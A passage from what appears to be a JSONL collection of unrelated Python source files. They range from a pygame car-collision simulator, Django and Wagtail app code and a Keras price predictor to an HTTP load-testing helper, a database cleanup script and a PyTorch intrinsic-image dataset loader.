아무것도 눌러지지 않았을 경우 \r\n else:\r\n #조향각을 '0'으로 설정한다.\r\n car.steering_angle = 0\r\n \r\n #steering의 범위를 (-30~30)사이의 값으로 제한한다. \r\n car.steering_angle = max(-car.max_steering, min(car.steering_angle, car.max_steering))\r\n\r\n #자동차의 상태를 단위시간마다 업데이트 해준다.\r\n car.update(dt)\r\n\r\n #스크린 배경을 검은색으로 지정한다.->흰색_plus\r\n screen.fill((255, 255, 255))\r\n\r\n #자동차 이미지 (car.png)를 회전시킨다.\r\n rotated = pygame.transform.rotate(car_image, car.yaw)\r\n #정지된 자동차 이미지를 회전시킨다._plus\r\n rotated_stop = pygame.transform.rotate(car_image_stop, car_stop.yaw+180)\r\n\r\n #자동차 이동 궤적 그리기_plus \r\n for i in range(len(car.Arr_x)):\r\n #car_xc = (car.Arr_x[i][0]+car.Arr_x[i][1])/2\r\n #car_yc = (car.Arr_y[i][0]+car.Arr_y[i][1])/2\r\n #pygame.draw.circle(screen, (255, 0, 0), [int(car_xc), int(car_yc)], 5)\r\n\r\n pygame.draw.line(screen, (0, 0, 255), [car.Arr_x[i][0], car.Arr_y[i][0]], [car.Arr_x[i][1],car.Arr_y[i][1]], 5)\r\n pygame.draw.line(screen, (0, 0, 255), [car.Arr_x[i][0], car.Arr_y[i][0]], [car.Arr_x[i][2],car.Arr_y[i][2]], 5)\r\n pygame.draw.line(screen, (0, 0, 255), [car.Arr_x[i][1], car.Arr_y[i][1]], [car.Arr_x[i][3],car.Arr_y[i][3]], 5)\r\n pygame.draw.line(screen, (0, 0, 255), [car.Arr_x[i][3], car.Arr_y[i][3]], [car.Arr_x[i][2],car.Arr_y[i][2]], 5)#수정 2->5\r\n\r\n #충돌하면 종료시키기_plus\r\n if car.Arr_y[i][0] < 230 and 170 < car.Arr_y[i][1] and car.Arr_x[i][0] < 1160 and 1030 < car.Arr_x[i][3]:\r\n print(\"충돌\")\r\n pygame.quit()\r\n\r\n #자동차 이동 선 그리기_plus #수정\r\n for i in range(len(car.Arr_xl)):\r\n car_xc = (car.Arr_xl[i][0]+car.Arr_xl[i][1])/2#수정\r\n car_yc = (car.Arr_yl[i][0]+car.Arr_yl[i][1])/2#수정\r\n pygame.draw.circle(screen, (255, 0, 0), [int(car_xc), int(car_yc)], 3)#수정 5->3\r\n #정지한 자동차 앞 위치 그리기_plus\r\n pygame.draw.circle(screen, (255,0,0), [1030, 200], 3)\r\n\r\n #회전된 자동차 이미지를 계산된 위치에 그린다.\r\n screen.blit(rotated, [car.car_img_x, car.car_img_y])\r\n #정지된 자동차 이미지를 그린다._plus\r\n screen.blit(rotated_stop, [car_stop.car_img_x_stop, car_stop.car_img_y_stop])\r\n\r\n #두 차 사이의 거리를 계산한다._plus\r\n dist = math.sqrt(pow(1030-(car_xc+130), 2) + pow(200-car_yc, 2))\r\n print(\"거리:\", dist)\r\n\r\n #화면을 갱신한다.\r\n pygame.display.flip()\r\n\r\n#while 루프를 빠져나왔으므로 프로그램을 종료한다\r\npygame.quit()\r\n","sub_path":"pygame_simul_carbody_crush.py","file_name":"pygame_simul_carbody_crush.py","file_ext":"py","file_size_in_byte":11730,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"531812773","text":"from django.db import models\nfrom django.utils import timezone\nfrom django.db.models.signals import post_save\nfrom django.dispatch import receiver\nfrom rest_framework.authtoken.models import Token\nfrom django.conf import settings\n\n\nclass Assignment(models.Model):\n SUBJECT_CHOICES = (\n ('English', 'English'),\n ('Tamil', 'Tamil'),\n ('Maths', 'Maths'),\n ('Physics', 'Physics'),\n ('Chemistry', 'Chemistry'),\n ('Biology', 'Biology'),\n )\n id = models.AutoField(primary_key=True)\n title = models.CharField(max_length=100)\n content = models.TextField()\n staff = models.CharField(max_length=100)\n date_posted = models.DateTimeField(default=timezone.now)\n due_date = models.DateField()\n subject = models.CharField(max_length=10, choices=SUBJECT_CHOICES)\n\n def __str__(self):\n return self.title\n\n\n@receiver(post_save, sender=settings.AUTH_USER_MODEL)\ndef create_auth_token(sender, instance=None, created=False, **kwargs):\n if created:\n Token.objects.create(user=instance)\n","sub_path":"assignment/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1052,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"343918104","text":"import pandas as pd\nimport numpy as np\nimport os\nimport math\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import mean_squared_error, accuracy_score\nfrom keras.models import model_from_json\nfrom keras.datasets import mnist\nfrom keras.layers import Activation, Dropout, Flatten, Dense\nfrom keras.layers import Conv2D, MaxPooling2D\nfrom keras.models import Sequential\nfrom keras.layers import Dense\nfrom keras import backend as K\n\ndef to_array_data(size):\n\n\tprice = []\n\tpredict = []\n\tn = 0\n\tn2 = 0\n\twhile n2 < size:\n\t\tprice.append([])\n\t\tpredict.append([])\n\t\tpredict[n2].append(hist['High'][n2] / 100000)\n\t\tpredict[n2].append(hist['Close'][n2] / 100000)\n\t\tpredict[n2].append(hist['Open'][n2] / 100000)\n\t\tpredict[n2].append(hist['Low'][n2] / 100000)\n\t\tn = 1\n\t\twhile n < 31:\n\t\t\tprice[n2].append(hist['High'][n + n2]/ 100000)\n\t\t\tprice[n2].append(hist['Close'][n + n2]/ 100000)\n\t\t\tprice[n2].append(hist['Open'][n + n2]/ 100000)\n\t\t\tprice[n2].append(hist['Low'][n + n2]/ 100000)\n\t\t\tprice[n2].append(hist['Week'][n + n2] / 53)\n\t\t\tprice[n2].append(hist['Weekday'][n + n2] / 6)\n\t\t\tn = n + 1\n\t\tn2 = n2 + 1\n\tpredict = np.asarray(predict)\n\tprice = np.asarray(price)\n\treturn price, predict\n\n\nhist = pd.read_csv(\"./History.csv\")\nhist['Weekday'] = pd.DataFrame({'Weekday':[]})\nhist['Week'] = pd.DataFrame({'Week':[]})\nhist['Date'] = pd.to_datetime(hist['Date'])\nhist['Week'] = hist['Date'].dt.week\nhist['Weekday'] = hist['Date'].dt.weekday\n\nprice, predict = to_array_data(len(hist['Week']) - 30)\n\nmodel = Sequential()\nX_train, X_test, Y_train, Y_test = train_test_split(price, predict, test_size = 0.13)\n\nif os.path.exists(\"./model.json\") and os.path.exists(\"./model.h5\"):\n\tjson_file = open('model.json', 'r')\n\tloaded_model_json = json_file.read()\n\tjson_file.close()\n\tmodel = model_from_json(loaded_model_json)\n\tmodel.load_weights(\"model.h5\")\nelse:\n\tmodel.add(Dense(180, input_dim = 180, activation=\"relu\", kernel_initializer=\"normal\"))\n\tmodel.add(Dense(90, activation=\"relu\", kernel_initializer=\"normal\"))\n\tmodel.add(Dense(45, activation=\"relu\", kernel_initializer=\"normal\"))\n\tmodel.add(Dense(4, activation=\"relu\", kernel_initializer=\"normal\"))\n\nmodel.compile(loss=\"mean_squared_error\", metrics=[\"accuracy\"], optimizer=\"Adam\")\nprint(model.summary())\ny1 = input(\"Train model Y-Yes N-No: \")\nif (y1 == 'y' or y1 == 'Y'):\n\tmodel.fit(X_train, Y_train, epochs = 2667, verbose = 1)\nans = model.predict(X_test)\n\nprint(\"{:.3f}\".format(math.sqrt(mean_squared_error(Y_test, ans))))\n\nprice, predict = to_array_data(2)\n\nsize = 1\nans = model.predict(price)\nans = ans * 100000\npredict = predict * 100000\nprint('\tMust\t\tHave')\nwhile size >= 0:\n\tprint('High\t{0:.1f}\t\t{1:.1f}'.format(predict[size][0], ans[size][0]))\n\tprint('Close\t{0:.1f}\t\t{1:.1f}'.format(predict[size][1], ans[size][1]))\n\tprint('Open\t{0:.1f}\t\t{1:.1f}'.format(predict[size][2], ans[size][2]))\n\tprint('Low\t{0:.1f}\t\t{1:.1f}\\n'.format(predict[size][3], ans[size][3]))\n\tsize = size - 1\n\nif(y1 == 'y' or y1 == 'Y'):\n\tyn = input(\"Save Neuro Y-Yes N-No: \")\n\tif (yn == 'y' or yn == 'Y'):\n\t\tmodel_json = model.to_json()\n\t\twith open(\"model.json\", \"w\") as json_file:\n\t\t\tjson_file.write(model_json)\n\t\tmodel.save_weights(\"model.h5\")\nK.clear_session()\n# \tMust\t\tHave\n# High\t11501.4\t\t11416.0\n# Close\t11359.4\t\t11261.4\n# Open\t10903.4\t\t10901.7\n# Low\t10639.8\t\t10640.9\n\n# High\t11785.7\t\t11684.8\n# Close\t11259.4\t\t11372.7\n# Open\t11421.7\t\t11527.4\n# Low\t11057.4\t\t11083.7\n\n\n\n# price = []\n# predict = []\n# n = 0\n# n2 = 0\n# while n2 < 2:\n# \tprice.append([])\n# \tpredict.append([])\n# \tn = 0\n# \twhile n < 30:\n# \t\tprice[n2].append([])\n# \t\tprice[n2][n].append(hist['High'][n + n2])\n# \t\tprice[n2][n].append(hist['Close'][n + n2])\n# \t\tprice[n2][n].append(hist['Open'][n + n2])\n# \t\tprice[n2][n].append(hist['Low'][n + n2])\n# \t\tprice[n2][n].append(hist['Week'][n + n2])\n# \t\tprice[n2][n].append(hist['Weekday'][n + n2])\n# \t\tn = n + 1\n# \tpredict[n2].append(hist['High'][n + n2])\n# \tpredict[n2].append(hist['Close'][n + n2])\n# \tpredict[n2].append(hist['Open'][n + n2])\n# \tpredict[n2].append(hist['Low'][n + n2])\n# \tn2 = n2 + 1\n# print(price[0][0:2])\n# print(predict[0:2])\n\n# model = Sequential()\n# model.add(Conv2D(13, (6,6), input_shape = (30, 7, 1)))\n# model.add(Activation('relu'))\n# model.add(Conv2D(13, (2, 2)))\n# model.add(Activation('relu'))\n# model.add(MaxPooling2D(pool_size=(2, 2)))\n# model.add(Dropout(0.25))\n# model.add(Flatten())\n# model.add(Dense(64))\n# model.add(Activation('relu'))\n# model.add(Dense(4))\n# model.add(Activation('softmax'))\n# model.compile(loss='categorical_crossentropy', optimizer='adam')","sub_path":"btc.py","file_name":"btc.py","file_ext":"py","file_size_in_byte":4541,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"472498126","text":"# -*- coding:utf-8 -*-\nimport requests\nimport datetime\nimport time\nimport threading\nimport settings\n\n\nclass UrlRequest(object):\n\n def __init__(self):\n self.times = []\n self.error = []\n\n def get_resp(self, url,data):\n my_resp = UrlRequest()\n r = requests.get(url, headers=settings.API_HEADERS, data=data)\n\n # 获取响应时间,单位ms\n ResponseTime = float(r.elapsed.microseconds) / 1000\n # 将响应时间写入数组\n my_resp.times.append(ResponseTime)\n # 判断状态码\n if r.status_code != 200:\n my_resp.error.append(\"0\")\n\n\nclass Pressure(object):\n \"\"\"\n 压力测试\n \"\"\"\n\n def __init__(self,thread_number=None,think_time=0,url=None,data=None):\n self.thread_number = thread_number #并发线程数\n self.think_time = think_time #思考时间\n self.threads = []\n self.url = url\n self.data = data\n\n def start(self):\n url_request = UrlRequest()\n start_time = datetime.datetime.now()\n print(\"request start time %s\" % start_time)\n\n for i in range(1, self.thread_number + 1):\n t = threading.Thread(target=url_request.get_resp, args=(self.url,self.data))\n self.threads.append(t)\n\n for t in self.threads:\n time.sleep(self.think_time)\n # 打印线程\n print(\"thread %s\" % t)\n t.setDaemon(True)\n t.start()\n t.join()\n\n end_time = datetime.datetime.now()\n print(\"request end time %s.\" % end_time)\n\n time.sleep(3)\n # 计算数组的平均值,保留3位小数\n AverageTime = \"{:.3f}\".format(float(sum(url_request.times)) / float(len(url_request.times)))\n # 打印平均响应时间\n print(\"Average Response Time %s ms\" % AverageTime)\n use_time = str(end_time - start_time)\n hour = use_time.split(':').pop(0)\n minute = use_time.split(':').pop(1)\n second = use_time.split(':').pop(2)\n # 计算总的思考时间+请求时间\n total_time = float(hour) * 60 * 60 + float(minute) * 60 + float(second)\n # 打印并发数\n print(\"Concurrent processing %s\" % self.thread_number)\n # 打印总共消耗的时间\n print(\"use total time %s s\" % (total_time - float(self.thread_number * self.think_time)))\n # 打印错误请求数\n print(\"fail request %s\" % url_request.error.count(\"0\"))","sub_path":"utilities/pressure_helper.py","file_name":"pressure_helper.py","file_ext":"py","file_size_in_byte":2459,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"559860539","text":"from keras.models import load_model\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom PIL import Image\r\nimport cv2\r\nimport random\r\n\r\nmodel = load_model(\"model_1.h5\")\r\n\r\ncap = cv2.VideoCapture(0) \r\ncap.set(3, 1280)\r\ncap.set(4, 720)\r\n\r\ndef bowl(n):\r\n if n==0:\r\n return 0\r\n elif n==5:\r\n return 4\r\n else:\r\n return 5\r\n\r\ndef bat(n):\r\n return n\r\n\r\nstart = 0\r\n\r\nwhile True:\r\n _, frame = cap.read()\r\n\r\n # rectangle for user to play\r\n cv2.rectangle(frame, (100, 100), (500, 500), (255, 255, 255), 2)\r\n # rectangle for computer to play\r\n cv2.rectangle(frame, (800, 100), (1200, 500), (255, 255, 255), 2)\r\n\r\n # extract the region of image within the user rectangle\r\n roi = frame[100:500, 100:500]\r\n img = cv2.cvtColor(roi, cv2.COLOR_BGR2RGB)\r\n img = cv2.resize(img, (64, 64))\r\n\r\n pred = model.predict(np.array([img]))\r\n ans = int(np.squeeze(np.dot(pred, [0, 1, 2, 3, 4, 5])))\r\n font = cv2.FONT_HERSHEY_SIMPLEX\r\n cv2.putText(frame, \"Your Move: \" + str(ans),\r\n (50, 50), font, 1.2, (255, 255, 255), 2, cv2.LINE_AA)\r\n cv2.putText(frame, \"Computer's Move: \" + str(bat(ans)),\r\n (750, 50), font, 1.2, (255, 255, 255), 2, cv2.LINE_AA)\r\n icon = cv2.imread(\r\n \"images/{}.jpg\".format(bat(ans)))\r\n icon = cv2.resize(icon, (400, 400))\r\n frame[100:500, 800:1200] = icon\r\n \r\n cv2.imshow(\"frame\", frame)\r\n k = cv2.waitKey(10)\r\n if k == ord('q'):\r\n break\r\n\r\ncap.release()\r\ncv2.destroyAllWindows()","sub_path":"bat.py","file_name":"bat.py","file_ext":"py","file_size_in_byte":1526,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"498601700","text":"\"\"\"\nCommon base classes\n^^^^^^^^^^^^^^^^^^^\n\"\"\"\n# pylint: disable=too-few-public-methods,\nimport os\n\nfrom lxml.etree import tounicode\n\n\nclass ExtensionBase:\n \"\"\"\n Base class for extensions of the :py:class:`Ocs` entry point.\n \"\"\"\n def __init__(self, osc_obj):\n self.osc = osc_obj\n\n\n# pylint: disable=too-many-instance-attributes\nclass DataDir:\n \"\"\"\n Compatibility layer for the ``.osc`` data directory used by the ``osc`` CLI\n \"\"\"\n data_dir = \".osc\"\n osclib_version_string = \"1.0\"\n\n # pylint: disable=too-many-arguments\n def __init__(self, osc, path, project, package=None, overwrite=False):\n self.osc = osc\n self.path = os.path.join(path, self.data_dir)\n self.project = project\n self.package = package\n self._apiurl = os.path.join(self.path, \"_apiurl\")\n self._project = os.path.join(self.path, \"_project\")\n self._package = os.path.join(self.path, \"_package\")\n self._files = os.path.join(self.path, \"_files\")\n self._osclib_version = os.path.join(self.path, \"_osclib_version\")\n if not os.path.isdir(self.path):\n os.makedirs(self.path)\n overwrite = True\n\n if overwrite:\n self.write_dir_contents()\n\n def write_dir_contents(self):\n \"\"\"\n Create files with default content in ``.osc`` sub-directory\n \"\"\"\n with open(self._apiurl, \"w\") as filehandle:\n filehandle.write(self.osc.url + os.linesep)\n\n with open(self._osclib_version, \"w\") as filehandle:\n filehandle.write(self.osclib_version_string + os.linesep)\n\n with open(self._project, \"w\") as filehandle:\n filehandle.write(self.project + os.linesep)\n\n if self.package:\n with open(self._package, \"w\") as filehandle:\n filehandle.write(self.package + os.linesep)\n\n with open(self._files, \"w\") as filehandle:\n filehandle.write(\n tounicode(self.osc.packages.get_files(self.project,\n self.package))\n )\n","sub_path":"osctiny/utils/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":2117,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"60999996","text":"#!/usr/bin/env\n\"\"\"\n This example was adapted from the mrjob documentation:\n \n https://pythonhosted.org/mrjob/guides/quickstart.html\n\"\"\"\n\nfrom mrjob.job import MRJob\n\nclass MRWordFrequencyCount(MRJob):\n \n def mapper(self, _, line):\n ## remove whitespace from front and end of line\n line = line.strip()\n ## yield the length of the line (including spaces)\n yield \"chars\", len(line)\n # yield the number of words on the line\n yield \"words\", len(line.split())\n # yield the number of lines (always 1)\n yield \"lines\", 1\n \n def reducer(self, key, values):\n ## the reducer simply sums all the \"chars\", \"words\" and \"lines\" values\n yield key, sum(values)\n\n\nif __name__ == '__main__':\n MRWordFrequencyCount.run()\n","sub_path":"scripts/mrjob_ex1.py","file_name":"mrjob_ex1.py","file_ext":"py","file_size_in_byte":794,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"359459572","text":"import ujson as json\nfrom scrapper.file.utils import smart_open\nfrom scrapper.commander import Commander\nfrom .utils import flatten\n\n\nclass Fields(Commander):\n scriptname = 'js.fields'\n\n @classmethod\n def setup_parser(cls, parser):\n parser.description = \"Extract all possible fields from the json file.\"\n parser.add_argument('input', nargs='?')\n parser.add_argument('-l', action='store_true', dest='use_line')\n\n @classmethod\n def initialize(cls, opts):\n return cls(opts.input, opts.use_line)\n\n def __init__(self, input_fname, use_line):\n self.input_fname = input_fname\n self.use_line = use_line\n self.fields = set()\n\n def run(self):\n with smart_open(self.input_fname, 'r') as f:\n for line in f:\n for field in flatten(json.loads(line)).keys():\n self.fields.add(field)\n delim = ' ' if self.use_line else '\\n'\n print(delim.join(sorted(self.fields)))\n","sub_path":"scrapper/js/fields.py","file_name":"fields.py","file_ext":"py","file_size_in_byte":983,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"540530094","text":"from django.views.generic import TemplateView\nfrom django.urls import reverse\nfrom django.conf import settings\n\nfrom home.models import BlogPage, get_all_tags\nfrom wagtail.search.models import Query\n\nfrom utils import get_paginated_pages\n\n\nclass SearchBlogView(TemplateView):\n template_name = \"search/search.html\"\n\n def get_context_data(self):\n search_query = self.request.GET.get('query', '')\n page = self.request.GET.get('page', 1)\n\n search_by_model = BlogPage\n return search(search_query, page, search_by_model)\n\n\ndef search(search_query, page, search_by_model):\n if search_query:\n search_results = search_by_model.objects.live().order_by(\n '-first_published_at').search(search_query.lower(),\n order_by_relevance=False)\n\n query = Query.get(search_query)\n # Record hit\n query.add_hit()\n else:\n search_results = search_by_model.objects.none()\n\n return {\n 'search_query': search_query,\n 'items': get_paginated_pages(\n page, search_results, settings.BLOG_POSTS_PER_PAGE),\n 'tags': get_all_tags(),\n 'add_url': reverse('search_blog')+'?query='+search_query.lower()+'&'\n }\n","sub_path":"search/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1241,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"31575886","text":"\n# coding: utf-8\n\n# ## Personal implementation of sparse coding layer\n# \n# source: https://github.com/EderSantana/blog/blob/master/2015-08-02%20sparse%20coding%20with%20keras.ipynb\n\n# In[3]:\n\nget_ipython().magic(u'matplotlib inline')\nimport os\nimport numpy as np\nimport theano\nfrom scipy.io import loadmat\nimport matplotlib.pyplot as plt\n\nfrom keras.models import Sequential\nfrom keras.regularizers import l2\nfrom keras.optimizers import RMSprop\n\n\n# In[4]:\n\nclass SparseCoding(Layer):\n def __init__(self, input_dim, output_dim,\n init='glorot_uniform',\n activation='linear',\n truncate_gradient=-1,\n gamma=.1, # \n n_steps=10,\n batch_size=100,\n return_reconstruction=False,\n W_regularizer=l2(.01),\n activity_regularizer=None):\n \n super(SparseCoding, self).__init__()\n self.init = init\n \n self.A = self.init((self.output_dim, self.input_dim)) \n # contrary to a regular neural net layer, here \n # the output needs to have the same dimension as\n # as the input we are modeling. Other layers would\n # have self.init((self.input_dim, self.output_dim))\n # as the dimensions of its adaptive coefficients.\n \n def get_output(self, train=False):\n s = self.get_input(train) # input data to be modeled\n initial_x = alloc_zeros_matrix(self.batch_size, self.output_dim) \n # initialize sparse codes with zeros.\n # Again note that the coefficients here got \n # output_dim as its last dimension because this \n # a generative model.\n outputs, updates = theano.scan(\n self._step, # function operated in the main loop\n sequences=[], # iterable input sequences, we don't need this here\n outputs_info=[initial_states, ]*3 + [None, ], # initial states, \n # I'll explain why we have 4 initial states.\n non_sequences=[inputs, prior], # this is kept the same for the entire for loop\n n_steps=self.n_steps, # since sequences is empty, scan needs this \n # information to know when to stop\n truncate_gradient=self.truncate_gradient) # how much backpropagation \n # through time/iteration you need.\n if self.return_reconstruction:\n return outputs[-1][-1] # return the approximation of the input\n else:\n return outputs[0][-1] # return the sparse codes\n\n\n# In[ ]:\n\n\n\n","sub_path":"personal_sparse_coder.py","file_name":"personal_sparse_coder.py","file_ext":"py","file_size_in_byte":2686,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"381547499","text":"#!/home/uwcc-admin/curw_fcst_db_utils/venv/bin/python3\nimport traceback\nfrom datetime import datetime, timedelta\n\nfrom db_adapter.constants import set_db_config_file_path\nfrom db_adapter.constants import connection\nfrom db_adapter.base import get_Pool, destroy_Pool\nfrom db_adapter.curw_fcst.common import get_distinct_fgts_for_given_id, get_curw_fcst_hash_ids\nfrom db_adapter.curw_fcst.timeseries import Timeseries\n\n# from db_adapter.constants import CURW_FCST_USERNAME, CURW_FCST_PORT, CURW_FCST_PASSWORD, CURW_FCST_HOST, \\\n# CURW_FCST_DATABASE\n\nMIKE11_2016 = 26\n\n\ndef select_fgts_older_than_month(fgts):\n\n select_fgts = []\n\n deadline = datetime.now() - timedelta(days=30)\n\n for fgt in fgts:\n if fgt < deadline:\n select_fgts.append(fgt)\n\n return select_fgts\n\n\ndef flush_timeseries(pool, hash_ids):\n\n TS = Timeseries(pool=pool)\n\n ###################################################################################\n # delete a specific timeseries defined by a given hash id and fgt from data table #\n ###################################################################################\n count = 0\n for id in hash_ids:\n fgts = get_distinct_fgts_for_given_id(pool=pool, id_=id)\n\n outdated_fgts = select_fgts_older_than_month(fgts)\n count += 1\n for fgt in outdated_fgts:\n fgts.remove(fgt)\n TS.delete_timeseries(id_=id, fgt=fgt)\n print(count, id, fgt)\n\n TS.update_start_date(id_=id, start_date=min(fgts), force=True)\n\n print(\"{} of hash ids are deleted.\".format(count))\n\n\nif __name__==\"__main__\":\n\n try:\n\n set_db_config_file_path('/home/uwcc-admin/curw_fcst_db_utils/db_adapter_config.json')\n\n pool = get_Pool(host=connection.CURW_FCST_HOST, port=connection.CURW_FCST_PORT, user=connection.CURW_FCST_USERNAME,\n password=connection.CURW_FCST_PASSWORD, db=connection.CURW_FCST_DATABASE)\n\n # pool = get_Pool(host=CURW_FCST_HOST, port=CURW_FCST_PORT,\n # user=CURW_FCST_USERNAME, password=CURW_FCST_PASSWORD, db=CURW_FCST_DATABASE)\n\n source_list = [MIKE11_2016]\n\n for source in source_list:\n mike_hash_ids = get_curw_fcst_hash_ids(pool=pool, sim_tag=\"hourly_run\", source_id=source,\n variable_id=None, unit_id=None, station_id=None,\n start=None, end=None)\n\n if mike_hash_ids is not None and len(mike_hash_ids) > 0:\n flush_timeseries(pool=pool, hash_ids=mike_hash_ids)\n\n\n except Exception as e:\n print('An exception occurred.')\n traceback.print_exc()\n finally:\n print(\"Process finished\")\n destroy_Pool(pool=pool)\n","sub_path":"flush_data/flush_mike_hourly_run_outdated_data.py","file_name":"flush_mike_hourly_run_outdated_data.py","file_ext":"py","file_size_in_byte":2761,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"546562990","text":"import os\nimport torch\nfrom torch.utils.data import Dataset, DataLoader\nfrom skimage import io, transform\nimport numpy as np\nimport skimage\nimport random\n#import imageio\nimport skimage.morphology as mpy\nfrom skimage.morphology import square\nrandom.seed(0)\nimport cv2\n\nclass CGI(Dataset):\n '''\n \tloading IIW data sets\n '''\n \n def __init__(self, dataFolder, albedoFolder, shadingFolder, normalFolder, maskFolder, fileListName, missingListName, transform=None):\n '''\n \tdataFolder: contains images\n \talbedoFolder: contains albedo\n \tshadingFolder: contains shading\n \tnormalFolder: contains normal information\n \tfileListName: all file names\n '''\n \n self.fileList = []\n with open(fileListName) as f:\n for line in f:\n self.fileList.append(line.strip())\n self.missingList = []\n with open(missingListName) as f:\n for line in f:\n self.missingList.append(line.strip())\n \n self.dataFolder = dataFolder\n self.albedoFolder = albedoFolder\n self.shadingFolder = shadingFolder\n self.normalFolder = normalFolder\n self.maskFolder = maskFolder\n self.transform = transform\n \n def __len__(self):\n return len(self.fileList)\n \n def __getitem__(self, idx):\n fileName = self.fileList[idx]\n\t\t# load image\n imgName = os.path.join(self.dataFolder, fileName + '_mlt.png')\n image = io.imread(imgName)\n if len(image.shape)==2:\n image = np.tile(image[...,None], (1, 3))\n image = np.float32(image)/255.0\n \n \n # load albedo\n albedoName = os.path.join(self.albedoFolder, fileName + '_mlt_albedo.png')\n albedo = io.imread(albedoName)\n if len(albedo.shape)==2:\n albedo = np.tile(albedo[...,None], (1, 3))\n albedo = np.float32(albedo)/255.0\n albedo[albedo < 1e-6] = 1e-6\n\n # --------------------------------------------------------------------\n # complicated code copied from CGI \n # I don't really think this block of code is totally correct\n # get shading and mask according to the code\n maskName = os.path.join(self.dataFolder, fileName + \"_mlt_mask.png\")\n mask = io.imread(maskName)\n mask = np.float32(mask)/255.0\n\n gt_R_gray = np.mean(albedo, 2)\n mask[gt_R_gray < 1e-6] = 0 \n mask[np.mean(image,2) < 1e-6] = 0\n mask = skimage.morphology.binary_erosion(mask, square(11))\n mask = np.expand_dims(mask, axis = 2)\n mask = np.repeat(mask, 3, axis= 2)\n albedo[albedo < 1e-6] = 1e-6\n\n rgb_img = image**2.2\n shading = rgb_img / albedo\n\n #mask[gt_S > 10] = 0 # CGI code this value is set to be 10, but I think it is wrong\n mask[shading > 20] = 0\n mask[shading < 1e-4] = 0\n\n shading[shading < 1e-4] = 1e-4\n shading[shading > 20] = 20\n\n if np.sum(mask) < 10:\n max_S = 1.0\n else:\n max_S = np.percentile(shading[mask > 0.5], 90)\n\n shading = shading/max_S\n mask = np.float32(np.abs(np.sum(mask, axis=2)/3.0 - 1.0)<1e-6)\n #------------------------------------------------------------------------\n\n \n ## shading saved as raw\n #shadingName = os.path.join(self.shadingFolder, fileName + '.tiff')\n #shading = imageio.imread(shadingName)\n #if len(shading.shape)==2:\n # shading = np.tile(shading[...,None], (1, 3))\n #shading = shading/20.0\n \n if fileName in self.missingList:\n # no normal\n imgHeight = image.shape[0]\n imgWidth = image.shape[1]\n normal = np.zeros((imgHeight, imgWidth, 3))\n normalMask = np.zeros((imgHeight, imgWidth))\n else:\n normalName = os.path.join(self.normalFolder, fileName + '_norm_camera.png')\n normal = io.imread(normalName)\n normalMaskName = os.path.join(self.normalFolder, fileName + '_valid.png')\n normalMask = io.imread(normalMaskName)\n\n \n if self.transform:\n image, albedo, shading, normal, mask, normalMask = \\\n self.transform([image, albedo, shading, normal, mask, normalMask])\n return image, albedo, shading, normal, mask, normalMask\n\nclass testTransfer(object):\n def __init__(self, output_size=64):\n # we need to think about this latter\n self.size=output_size\n def __call__(self, sample):\n # center crop\n image, albedo, shading, normal, mask, normalMask = sample\n\n # directly resize the image\n image = cv2.resize(image, (self.size, self.size), interpolation=cv2.INTER_CUBIC)\n albedo = cv2.resize(albedo, (self.size, self.size), interpolation=cv2.INTER_CUBIC)\n shading = cv2.resize(shading, (self.size, self.size), interpolation=cv2.INTER_CUBIC)\n normal = cv2.resize(normal, (self.size, self.size), interpolation=cv2.INTER_CUBIC)\n mask = cv2.resize(mask, (self.size, self.size), interpolation=cv2.INTER_CUBIC)\n mask = np.expand_dims(mask, axis=-1)\n normalMask = cv2.resize(normalMask, (self.size, self.size), interpolation=cv2.INTER_CUBIC)\n normalMask = np.expand_dims(normalMask, axis=-1)\n \n normal = normal.astype(np.float)\n normal = (normal/255.0-0.5)*2\n normal = normal/(np.linalg.norm(normal, axis=-1, keepdims=True) + 1e-6)\n mask = 1.0*mask/255.0\n normalMask = 1.0*normalMask/255.0\n #mask = mask*normalMask\n \n return image, albedo, shading, normal, mask, normalMask\n\n\nclass cropImg(object):\n '''\n randomly flip, resize and crop\n '''\n def __init__(self, output_size=256, maxSize=300):\n self.size = output_size\n self.maxSize = maxSize\n def __call__(self, sample):\n image, albedo, shading, normal, mask, normalMask= sample\n\n # randomly resize the image to 256 to 300 images\n imgSize = np.random.randint(self.size, self.maxSize)\n\n image = cv2.resize(image, (imgSize, imgSize), interpolation=cv2.INTER_CUBIC)\n albedo = cv2.resize(albedo, (imgSize, imgSize), interpolation=cv2.INTER_CUBIC)\n shading = cv2.resize(shading, (imgSize, imgSize), interpolation=cv2.INTER_CUBIC)\n normal = cv2.resize(normal, (imgSize, imgSize), interpolation=cv2.INTER_CUBIC)\n mask = cv2.resize(mask, (imgSize, imgSize), interpolation=cv2.INTER_CUBIC)\n normalMask = cv2.resize(normalMask, (imgSize, imgSize), interpolation=cv2.INTER_CUBIC)\n\n # random crop\n H = image.shape[0]\n W = image.shape[1]\n maxH = H - self.size\n maxW = W - self.size\n sH = random.randint(0, maxH)\n sW = random.randint(0, maxW)\n \n image = image[sH:sH+self.size, sW:sW+self.size,:]\n albedo = albedo[sH:sH+self.size, sW:sW+self.size,:]\n shading = shading[sH:sH+self.size, sW:sW+self.size,:]\n normal = normal[sH:sH+self.size, sW:sW+self.size,:]\n mask = mask[sH:sH+self.size, sW:sW+self.size]\n normalMask = normalMask[sH:sH+self.size, sW:sW+self.size]\n 